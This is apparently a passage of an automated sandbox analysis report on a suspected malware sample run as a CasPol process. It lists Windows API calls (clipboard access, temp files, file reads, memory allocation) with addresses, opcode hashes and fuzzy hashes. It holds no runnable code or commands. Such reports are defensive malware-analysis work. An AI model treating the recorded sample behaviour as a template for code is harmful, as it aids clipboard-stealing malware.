                                                                                                                                                                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                    • OpenClipboard.USER32(?), ref: 00411878
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041188D
                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 004118AC
                                                                                                                                                                                                                      • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                                                      • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                                                      • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                                                      • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                                                      • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                                                      • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                                                      • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                                                      • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                                                      • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2633007058-0
                                                                                                                                                                                                                    • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                                                                                                    • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                    • free.MSVCRT ref: 00407082
                                                                                                                                                                                                                      • Part of subcall function 004069DF: memcpy.MSVCRT(Af@,?,?,00406A37,?,?,00000000,?,?,?,?,00406641,?), ref: 004069FB
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: free$memcpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2037443186-0
                                                                                                                                                                                                                    • Opcode ID: 80c0924e07d809e6707357135025925db21493fae5091c55bba71e6fa9b8d5f3
                                                                                                                                                                                                                    • Instruction ID: 420730b51c6485b03e68e59ad930d3fea23228fdda059c903cb8609e0c2e012e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 80c0924e07d809e6707357135025925db21493fae5091c55bba71e6fa9b8d5f3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54027D71D042299BDF24DF65C8846EEB7B1BF48314F1481BAE849BB381D738AE81CB55
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: >PD$>PD
                                                                                                                                                                                                                    • API String ID: 0-241360673
                                                                                                                                                                                                                    • Opcode ID: 636fa6e870849a123d623615516b3e2858f70bd84403162da8d36c2a659e764e
                                                                                                                                                                                                                    • Instruction ID: 8e2198200500fa0fc3bc88275214576e19b26caf2554f569e41e4ab64c40c239
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 636fa6e870849a123d623615516b3e2858f70bd84403162da8d36c2a659e764e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B81D630D091E58FDB0A8B7D88901BDFFF4EF9A20075442AED8D2E7346C6744A11CBA1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: UUUU$g|@
                                                                                                                                                                                                                    • API String ID: 0-841461634
                                                                                                                                                                                                                    • Opcode ID: f341a98deb1e5e92d7066587e62b77daad1dfda02a02c613fc9f81484624d4c1
                                                                                                                                                                                                                    • Instruction ID: 2d8d9101cd04074a5c169b043e39b4a3b006c2ce9d561f0fe2de225ae1ad389f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f341a98deb1e5e92d7066587e62b77daad1dfda02a02c613fc9f81484624d4c1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA214C327745150BF39CE93D8C1376B62D2DBC8254B18CA3EA6A6C32C1EC6CE9138285
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1865533344-0
                                                                                                                                                                                                                    • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                                                                                                    • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Version
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1889659487-0
                                                                                                                                                                                                                    • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                                                                                    • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: NtdllProc_Window
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4255912815-0
                                                                                                                                                                                                                    • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                                                    • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: UUUU
                                                                                                                                                                                                                    • API String ID: 0-1798160573
                                                                                                                                                                                                                    • Opcode ID: 6e1e4e56239aba6d4b5f371f50ca2a6486f6950dba42b8055aa6bd6fb2d86270
                                                                                                                                                                                                                    • Instruction ID: 031174199a2b1a8cd9c643e612bfbadf4fe973dd8768dd983b5f488536bda3ff
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e1e4e56239aba6d4b5f371f50ca2a6486f6950dba42b8055aa6bd6fb2d86270
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4451E233F208600BE74CCA6DCC663692A9397C9350B1E827DDA93D73C6DDB8D912D284
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: (D8
                                                                                                                                                                                                                    • API String ID: 0-3292100582
                                                                                                                                                                                                                    • Opcode ID: afb84a8e293b758f390aa1d9387a194cd56d4447f941d82ef217d3f5840c1f1b
                                                                                                                                                                                                                    • Instruction ID: b71c20539f751f79200ae51b58374c03269679265288fab777333ac0774f48a4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: afb84a8e293b758f390aa1d9387a194cd56d4447f941d82ef217d3f5840c1f1b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3641441510DBD19EC326CB7D4890496FFE15EB6001748CA8EE4E987B83C158F658D7B2
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: b84eadeceb15b833d74a6b3ddcf4bdaa302aef256980365e51470e07e4227508
                                                                                                                                                                                                                    • Instruction ID: 8e3ad788e2b47047ad7c21b66b362804302468dbbdc0c1ed7242a88a839864d8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b84eadeceb15b833d74a6b3ddcf4bdaa302aef256980365e51470e07e4227508
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC42D5B7E403299FCB14CFD5C8C0589F7B2BFD8314B1B95958918BB216D2B4BA468BD0
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 8bfddd58f67f2436f602948d81bfc00a2609cff06b9fa19cda26eb50e58ddabf
                                                                                                                                                                                                                    • Instruction ID: 7d9bfc9c0f16f1db2f1641295165e9d5c4cc4fabe66290bd88ea3126be947770
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8bfddd58f67f2436f602948d81bfc00a2609cff06b9fa19cda26eb50e58ddabf
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79027D719245F08EE359CF3F8454922BFE2AFCD21134BC2EAD8985F267C2759812CB94
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: ea2784362ab7c2fac8b349cfe16d3b1a50e1b173db14e7fbef4268f2e7a6201e
                                                                                                                                                                                                                    • Instruction ID: 8e52665ec80593729d0e137496ce0ecfadfbe33a5de6fc479c009b4a0482c98f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea2784362ab7c2fac8b349cfe16d3b1a50e1b173db14e7fbef4268f2e7a6201e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2FF1AD75A093448FE355DF2AC89066BF7E2EFC8300F55892CE5C98735AD634E90ACB46
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 9368682a8ca0b2c1eba9e9c5dafaf747a856ed5e465dd40cb381c52ffbca3266
                                                                                                                                                                                                                    • Instruction ID: 333d6665b213bbb0b2ffe7480c8a97369f7725c8c3b7ff4245839d8e70af8f4c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9368682a8ca0b2c1eba9e9c5dafaf747a856ed5e465dd40cb381c52ffbca3266
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FCF1AE75A093448FE355DF2AC89066BF7E2EFC8300F95892CE5C687356D634E90ACB46
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 59b96f3b5a46ad6901b43840c28e1a8717f830646a2449cfd97c8525daecb054
                                                                                                                                                                                                                    • Instruction ID: 6d69576c35898859ca8d02efc530e7c6766c76f2b8aabf7fdbce863400c080a7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59b96f3b5a46ad6901b43840c28e1a8717f830646a2449cfd97c8525daecb054
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BEF15B325087928FE300CF2ADC9012ABBE3EFC9202F5D866DD6951B697C634F516CB95
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 872606032cdd08379d71d43e88e90617dc2c1c78644fe60afe31ae32dbf4f59b
                                                                                                                                                                                                                    • Instruction ID: 40919babecf7e48beddfee2e0cc32287ff98735fe93911287fdb93ed5d1816d5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 872606032cdd08379d71d43e88e90617dc2c1c78644fe60afe31ae32dbf4f59b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AFF17A325087928FE304CF2AE89112AFBE2EFC9201F4D8679D69507793C634F521CB96
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 64d9d5eb1bf088bc77b86d82daa6f27b74e792b3196096c73e0e81993fefd3f0
                                                                                                                                                                                                                    • Instruction ID: adc93f76a53c8e047bf109f201bc7ef7b47700f57dd2e643460dcd4bbcc33c52
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64d9d5eb1bf088bc77b86d82daa6f27b74e792b3196096c73e0e81993fefd3f0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADD10277E107118BD754CFAAFD8010A7363BB9E311B5B8261CA146736AD2B4BA13DAC4
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 34e59dc519e63a3a388629f852dae47993483b64081670961a075e996c77d8fa
                                                                                                                                                                                                                    • Instruction ID: 9e132a6a99c217a0d654eab39c971d31e6f6fb31db3c9ae67be1c5f399a16f42
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34e59dc519e63a3a388629f852dae47993483b64081670961a075e996c77d8fa
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3A19F77BA0B0907E31849EAACC6394B68397D4315F2E423DCB74C73D2E9FD99168294
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: bc3cff37084f2d0a492ca6bb6b1919cd8870f06ce0428e5eb89ecad11dcb3b00
                                                                                                                                                                                                                    • Instruction ID: b5a75dcfa354664a12c4438d09bdc6ab1492452f04355958c3e9fdee34c44c91
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc3cff37084f2d0a492ca6bb6b1919cd8870f06ce0428e5eb89ecad11dcb3b00
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8351E1B2A10A159BE75CCF1AC9652A9BFE3DFD1301B19817ED1E7C7280C6749142EB00
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 4d68b984f6741099ce2bde8e18abc1ceb050e4a180a5a8b929aeeeda86c5e3a3
                                                                                                                                                                                                                    • Instruction ID: 4c30e17d77d63121b98ae7abe83a1eda91c3bbaf1771cbdb9001038880bae346
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d68b984f6741099ce2bde8e18abc1ceb050e4a180a5a8b929aeeeda86c5e3a3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55613BB0A097118FD358CF2AC88066BFBE1FBC8315F448A2EE5D9C3295D778A505CB51
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 32abcd04455321b07f66e99fd0bcc8daf237abc4de33049fd76ff7c9198d1abb
                                                                                                                                                                                                                    • Instruction ID: 7b529b0c1894574a094486b107de62a614b2b8bb623f091bad4def53639f0530
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32abcd04455321b07f66e99fd0bcc8daf237abc4de33049fd76ff7c9198d1abb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C5126B17203054BE308CE28EC503AA7BD3EBC534AF18C63DC541C768AD67EE5164785
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 3b3061fac263143bf3d11d038388f116502fba1d2a280c6dd7583d1d6c59509c
                                                                                                                                                                                                                    • Instruction ID: 3574e4e96b5cae7c2ce7dcf764c1f42f5149340d1e6b4e9c3817a5d878268b27
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b3061fac263143bf3d11d038388f116502fba1d2a280c6dd7583d1d6c59509c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A25119729245F08EE395CB3F8454812BFE2AFCD21234FC2D6D8D86B567D2719822DB94
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 916c56741cc8f6ade01a16149e57abe195bb5378381ef9de74a807da475a2b6d
                                                                                                                                                                                                                    • Instruction ID: a63f790cb74f6972c31383897434a808543730992f85785b63cb3a81aa66305c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 916c56741cc8f6ade01a16149e57abe195bb5378381ef9de74a807da475a2b6d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D751A26170D7905BD7098B3894506AFFFD1ABDA304F498A6DF4CA9B382C5249A08C79A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 29029382298886ffb5c972b1d452ec7b0888992857c24374549475b705505bbf
                                                                                                                                                                                                                    • Instruction ID: c0f57332b75f98b7b3b9f2f8260941e7774f0d3fac54c31b43d02fa3067fd927
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 29029382298886ffb5c972b1d452ec7b0888992857c24374549475b705505bbf
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E351115510DBD29EC3268B7D4490196FFF16E77101708CA8EE4EA47B83D118F6A8DBB2
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: bf2dd090743e2c6723c98dc34c7731ba56a2aa4091d3d4934fb2d269311e6206
                                                                                                                                                                                                                    • Instruction ID: 6bf344bc0ac2e9a1038f2722d90c5adff34fed9f267e6e685f57ef4be10f9a8b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf2dd090743e2c6723c98dc34c7731ba56a2aa4091d3d4934fb2d269311e6206
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C20171367207058FD308CFADFCC1966B3B2FBD92127084539DA01C3267EA78E921CA54
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: cf104503c4d1f63e508e528481e2c1d582825b9df7b848c5f582128bf29b2c3b
                                                                                                                                                                                                                    • Instruction ID: 1c8cf4990013556009a943ce68bbe5c533817c3d042a03847a5f6a4628de1edc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf104503c4d1f63e508e528481e2c1d582825b9df7b848c5f582128bf29b2c3b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA01E8326159308FA389DE3AC80144377E3FFCA32532AC1E5C945AB57DD6316847DB90
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
